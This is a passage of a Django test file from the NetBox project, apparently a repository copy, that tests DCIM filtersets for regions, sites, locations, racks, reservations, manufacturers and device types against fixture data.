netbox/dcim/tests/test_filtersets.py
|
peteeckel/netbox
|
06cb7f35f1698f6a0b43014e8bebe37a97237308
|
[
"Apache-2.0"
] | 1
|
2022-03-11T09:38:32.000Z
|
2022-03-11T09:38:32.000Z
|
netbox/dcim/tests/test_filtersets.py
|
peteeckel/netbox
|
06cb7f35f1698f6a0b43014e8bebe37a97237308
|
[
"Apache-2.0"
] | null | null | null |
netbox/dcim/tests/test_filtersets.py
|
peteeckel/netbox
|
06cb7f35f1698f6a0b43014e8bebe37a97237308
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib.auth.models import User
from django.test import TestCase
from dcim.choices import *
from dcim.filtersets import *
from dcim.models import *
from ipam.models import ASN, IPAddress, RIR
from tenancy.models import Tenant, TenantGroup
from utilities.choices import ColorChoices
from utilities.testing import ChangeLoggedFilterSetTests
from virtualization.models import Cluster, ClusterType
from wireless.choices import WirelessChannelChoices, WirelessRoleChoices
class RegionTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Region.objects.all()
filterset = RegionFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1', description='A'),
Region(name='Region 2', slug='region-2', description='B'),
Region(name='Region 3', slug='region-3', description='C'),
)
for region in regions:
region.save()
child_regions = (
Region(name='Region 1A', slug='region-1a', parent=regions[0]),
Region(name='Region 1B', slug='region-1b', parent=regions[0]),
Region(name='Region 2A', slug='region-2a', parent=regions[1]),
Region(name='Region 2B', slug='region-2b', parent=regions[1]),
Region(name='Region 3A', slug='region-3a', parent=regions[2]),
Region(name='Region 3B', slug='region-3b', parent=regions[2]),
)
for region in child_regions:
region.save()
def test_name(self):
params = {'name': ['Region 1', 'Region 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['region-1', 'region-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_parent(self):
parent_regions = Region.objects.filter(parent__isnull=True)[:2]
params = {'parent_id': [parent_regions[0].pk, parent_regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'parent': [parent_regions[0].slug, parent_regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
class SiteGroupTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = SiteGroup.objects.all()
filterset = SiteGroupFilterSet
@classmethod
def setUpTestData(cls):
sitegroups = (
SiteGroup(name='Site Group 1', slug='site-group-1', description='A'),
SiteGroup(name='Site Group 2', slug='site-group-2', description='B'),
SiteGroup(name='Site Group 3', slug='site-group-3', description='C'),
)
for sitegroup in sitegroups:
sitegroup.save()
child_sitegroups = (
SiteGroup(name='Site Group 1A', slug='site-group-1a', parent=sitegroups[0]),
SiteGroup(name='Site Group 1B', slug='site-group-1b', parent=sitegroups[0]),
SiteGroup(name='Site Group 2A', slug='site-group-2a', parent=sitegroups[1]),
SiteGroup(name='Site Group 2B', slug='site-group-2b', parent=sitegroups[1]),
SiteGroup(name='Site Group 3A', slug='site-group-3a', parent=sitegroups[2]),
SiteGroup(name='Site Group 3B', slug='site-group-3b', parent=sitegroups[2]),
)
for sitegroup in child_sitegroups:
sitegroup.save()
def test_name(self):
params = {'name': ['Site Group 1', 'Site Group 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['site-group-1', 'site-group-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_parent(self):
parent_sitegroups = SiteGroup.objects.filter(parent__isnull=True)[:2]
params = {'parent_id': [parent_sitegroups[0].pk, parent_sitegroups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'parent': [parent_sitegroups[0].slug, parent_sitegroups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
class SiteTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Site.objects.all()
filterset = SiteFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
rir = RIR.objects.create(name='RFC 6996', is_private=True)
asns = (
ASN(asn=64512, rir=rir, tenant=tenants[0]),
ASN(asn=64513, rir=rir, tenant=tenants[0]),
ASN(asn=64514, rir=rir, tenant=tenants[0]),
)
ASN.objects.bulk_create(asns)
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0], tenant=tenants[0], status=SiteStatusChoices.STATUS_ACTIVE, facility='Facility 1', asn=65001, latitude=10, longitude=10, contact_name='Contact 1', contact_phone='123-555-0001', contact_email='contact1@example.com', description='foobar1'),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1], tenant=tenants[1], status=SiteStatusChoices.STATUS_PLANNED, facility='Facility 2', asn=65002, latitude=20, longitude=20, contact_name='Contact 2', contact_phone='123-555-0002', contact_email='contact2@example.com', description='foobar2'),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2], tenant=tenants[2], status=SiteStatusChoices.STATUS_RETIRED, facility='Facility 3', asn=65003, latitude=30, longitude=30, contact_name='Contact 3', contact_phone='123-555-0003', contact_email='contact3@example.com'),
)
Site.objects.bulk_create(sites)
sites[0].asns.set([asns[0]])
sites[1].asns.set([asns[1]])
sites[2].asns.set([asns[2]])
def test_name(self):
params = {'name': ['Site 1', 'Site 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['site-1', 'site-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_facility(self):
params = {'facility': ['Facility 1', 'Facility 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asn(self):
params = {'asn': [65001, 65002]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asn_id(self):
asns = ASN.objects.all()[:2]
params = {'asn_id': [asns[0].pk, asns[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_latitude(self):
params = {'latitude': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_longitude(self):
params = {'longitude': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_contact_name(self):
params = {'contact_name': ['Contact 1', 'Contact 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_contact_phone(self):
params = {'contact_phone': ['123-555-0001', '123-555-0002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_contact_email(self):
params = {'contact_email': ['contact1@example.com', 'contact2@example.com']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [SiteStatusChoices.STATUS_ACTIVE, SiteStatusChoices.STATUS_PLANNED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
groups = SiteGroup.objects.all()[:2]
params = {'group_id': [groups[0].pk, groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'group': [groups[0].slug, groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class LocationTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Location.objects.all()
filterset = LocationFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
parent_locations = (
Location(name='Parent Location 1', slug='parent-location-1', site=sites[0]),
Location(name='Parent Location 2', slug='parent-location-2', site=sites[1]),
Location(name='Parent Location 3', slug='parent-location-3', site=sites[2]),
)
for location in parent_locations:
location.save()
locations = (
Location(name='Location 1', slug='location-1', site=sites[0], parent=parent_locations[0], description='A'),
Location(name='Location 2', slug='location-2', site=sites[1], parent=parent_locations[1], description='B'),
Location(name='Location 3', slug='location-3', site=sites[2], parent=parent_locations[2], description='C'),
)
for location in locations:
location.save()
def test_name(self):
params = {'name': ['Location 1', 'Location 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['location-1', 'location-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_parent(self):
parent_groups = Location.objects.filter(name__startswith='Parent')[:2]
params = {'parent_id': [parent_groups[0].pk, parent_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'parent': [parent_groups[0].slug, parent_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RackRoleTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RackRole.objects.all()
filterset = RackRoleFilterSet
@classmethod
def setUpTestData(cls):
rack_roles = (
RackRole(name='Rack Role 1', slug='rack-role-1', color='ff0000', description='foobar1'),
RackRole(name='Rack Role 2', slug='rack-role-2', color='00ff00', description='foobar2'),
RackRole(name='Rack Role 3', slug='rack-role-3', color='0000ff'),
)
RackRole.objects.bulk_create(rack_roles)
def test_name(self):
params = {'name': ['Rack Role 1', 'Rack Role 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['rack-role-1', 'rack-role-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': ['ff0000', '00ff00']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RackTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Rack.objects.all()
filterset = RackFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
rack_roles = (
RackRole(name='Rack Role 1', slug='rack-role-1'),
RackRole(name='Rack Role 2', slug='rack-role-2'),
RackRole(name='Rack Role 3', slug='rack-role-3'),
)
RackRole.objects.bulk_create(rack_roles)
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
racks = (
Rack(name='Rack 1', facility_id='rack-1', site=sites[0], location=locations[0], tenant=tenants[0], status=RackStatusChoices.STATUS_ACTIVE, role=rack_roles[0], serial='ABC', asset_tag='1001', type=RackTypeChoices.TYPE_2POST, width=RackWidthChoices.WIDTH_19IN, u_height=42, desc_units=False, outer_width=100, outer_depth=100, outer_unit=RackDimensionUnitChoices.UNIT_MILLIMETER),
Rack(name='Rack 2', facility_id='rack-2', site=sites[1], location=locations[1], tenant=tenants[1], status=RackStatusChoices.STATUS_PLANNED, role=rack_roles[1], serial='DEF', asset_tag='1002', type=RackTypeChoices.TYPE_4POST, width=RackWidthChoices.WIDTH_21IN, u_height=43, desc_units=False, outer_width=200, outer_depth=200, outer_unit=RackDimensionUnitChoices.UNIT_MILLIMETER),
Rack(name='Rack 3', facility_id='rack-3', site=sites[2], location=locations[2], tenant=tenants[2], status=RackStatusChoices.STATUS_RESERVED, role=rack_roles[2], serial='GHI', asset_tag='1003', type=RackTypeChoices.TYPE_CABINET, width=RackWidthChoices.WIDTH_23IN, u_height=44, desc_units=True, outer_width=300, outer_depth=300, outer_unit=RackDimensionUnitChoices.UNIT_INCH),
)
Rack.objects.bulk_create(racks)
def test_name(self):
params = {'name': ['Rack 1', 'Rack 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_facility_id(self):
params = {'facility_id': ['rack-1', 'rack-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asset_tag(self):
params = {'asset_tag': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [RackTypeChoices.TYPE_2POST, RackTypeChoices.TYPE_4POST]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_width(self):
params = {'width': [RackWidthChoices.WIDTH_19IN, RackWidthChoices.WIDTH_21IN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_u_height(self):
params = {'u_height': [42, 43]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_desc_units(self):
params = {'desc_units': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'desc_units': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_outer_width(self):
params = {'outer_width': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_outer_depth(self):
params = {'outer_depth': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_outer_unit(self):
self.assertEqual(Rack.objects.filter(outer_unit__isnull=False).count(), 3)
params = {'outer_unit': RackDimensionUnitChoices.UNIT_MILLIMETER}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [RackStatusChoices.STATUS_ACTIVE, RackStatusChoices.STATUS_PLANNED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_role(self):
roles = RackRole.objects.all()[:2]
params = {'role_id': [roles[0].pk, roles[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'role': [roles[0].slug, roles[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_serial(self):
params = {'serial': 'ABC'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'serial': 'abc'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RackReservationTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RackReservation.objects.all()
filterset = RackReservationFilterSet
@classmethod
def setUpTestData(cls):
sites = (
Site(name='Site 1', slug='site-1'),
Site(name='Site 2', slug='site-2'),
Site(name='Site 3', slug='site-3'),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
racks = (
Rack(name='Rack 1', site=sites[0], location=locations[0]),
Rack(name='Rack 2', site=sites[1], location=locations[1]),
Rack(name='Rack 3', site=sites[2], location=locations[2]),
)
Rack.objects.bulk_create(racks)
users = (
User(username='User 1'),
User(username='User 2'),
User(username='User 3'),
)
User.objects.bulk_create(users)
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
reservations = (
RackReservation(rack=racks[0], units=[1, 2, 3], user=users[0], tenant=tenants[0], description='foobar1'),
RackReservation(rack=racks[1], units=[4, 5, 6], user=users[1], tenant=tenants[1], description='foobar2'),
RackReservation(rack=racks[2], units=[7, 8, 9], user=users[2], tenant=tenants[2]),
)
RackReservation.objects.bulk_create(reservations)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_user(self):
users = User.objects.all()[:2]
params = {'user_id': [users[0].pk, users[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'user': [users[0].username, users[1].username]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class ManufacturerTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Manufacturer.objects.all()
filterset = ManufacturerFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1', description='A'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2', description='B'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3', description='C'),
)
Manufacturer.objects.bulk_create(manufacturers)
def test_name(self):
params = {'name': ['Manufacturer 1', 'Manufacturer 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['manufacturer-1', 'manufacturer-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class DeviceTypeTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceType.objects.all()
filterset = DeviceTypeFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
device_types = (
DeviceType(manufacturer=manufacturers[0], model='Model 1', slug='model-1', part_number='Part Number 1', u_height=1, is_full_depth=True),
DeviceType(manufacturer=manufacturers[1], model='Model 2', slug='model-2', part_number='Part Number 2', u_height=2, is_full_depth=True, subdevice_role=SubdeviceRoleChoices.ROLE_PARENT, airflow=DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR),
DeviceType(manufacturer=manufacturers[2], model='Model 3', slug='model-3', part_number='Part Number 3', u_height=3, is_full_depth=False, subdevice_role=SubdeviceRoleChoices.ROLE_CHILD, airflow=DeviceAirflowChoices.AIRFLOW_REAR_TO_FRONT),
)
DeviceType.objects.bulk_create(device_types)
# Add component templates for filtering
ConsolePortTemplate.objects.bulk_create((
ConsolePortTemplate(device_type=device_types[0], name='Console Port 1'),
ConsolePortTemplate(device_type=device_types[1], name='Console Port 2'),
))
ConsoleServerPortTemplate.objects.bulk_create((
ConsoleServerPortTemplate(device_type=device_types[0], name='Console Server Port 1'),
ConsoleServerPortTemplate(device_type=device_types[1], name='Console Server Port 2'),
))
PowerPortTemplate.objects.bulk_create((
PowerPortTemplate(device_type=device_types[0], name='Power Port 1'),
PowerPortTemplate(device_type=device_types[1], name='Power Port 2'),
))
PowerOutletTemplate.objects.bulk_create((
PowerOutletTemplate(device_type=device_types[0], name='Power Outlet 1'),
PowerOutletTemplate(device_type=device_types[1], name='Power Outlet 2'),
))
InterfaceTemplate.objects.bulk_create((
InterfaceTemplate(device_type=device_types[0], name='Interface 1'),
InterfaceTemplate(device_type=device_types[1], name='Interface 2'),
))
rear_ports = (
RearPortTemplate(device_type=device_types[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C),
RearPortTemplate(device_type=device_types[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C),
)
RearPortTemplate.objects.bulk_create(rear_ports)
FrontPortTemplate.objects.bulk_create((
FrontPortTemplate(device_type=device_types[0], name='Front Port 1', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[0]),
FrontPortTemplate(device_type=device_types[1], name='Front Port 2', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[1]),
))
DeviceBayTemplate.objects.bulk_create((
DeviceBayTemplate(device_type=device_types[0], name='Device Bay 1'),
DeviceBayTemplate(device_type=device_types[1], name='Device Bay 2'),
))
def test_model(self):
params = {'model': ['Model 1', 'Model 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['model-1', 'model-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_part_number(self):
params = {'part_number': ['Part Number 1', 'Part Number 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_u_height(self):
params = {'u_height': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_is_full_depth(self):
params = {'is_full_depth': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'is_full_depth': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_subdevice_role(self):
params = {'subdevice_role': SubdeviceRoleChoices.ROLE_PARENT}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_airflow(self):
params = {'airflow': DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_console_ports(self):
params = {'console_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_console_server_ports(self):
params = {'console_server_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_server_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_ports(self):
params = {'power_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_outlets(self):
params = {'power_outlets': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_outlets': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_interfaces(self):
params = {'interfaces': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'interfaces': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_pass_through_ports(self):
params = {'pass_through_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'pass_through_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_device_bays(self):
params = {'device_bays': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device_bays': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class ConsolePortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsolePortTemplate.objects.all()
filterset = ConsolePortTemplateFilterSet
@classmethod
def setUpTestData(cls):
